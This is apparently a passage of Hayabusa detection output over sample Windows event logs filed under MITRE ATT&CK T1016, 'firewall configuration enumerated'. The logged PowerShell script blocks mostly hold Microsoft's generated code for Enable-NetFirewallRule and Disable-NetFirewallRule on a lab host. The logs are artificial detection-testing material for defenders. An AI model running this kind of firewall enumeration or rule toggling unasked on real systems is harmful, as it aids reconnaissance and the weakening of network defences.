'MS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and 
(@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } 
if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } 
$__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssocia",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) 
$__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and 
(@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] 
switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx
+2021-10-25 16:23:05.598 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
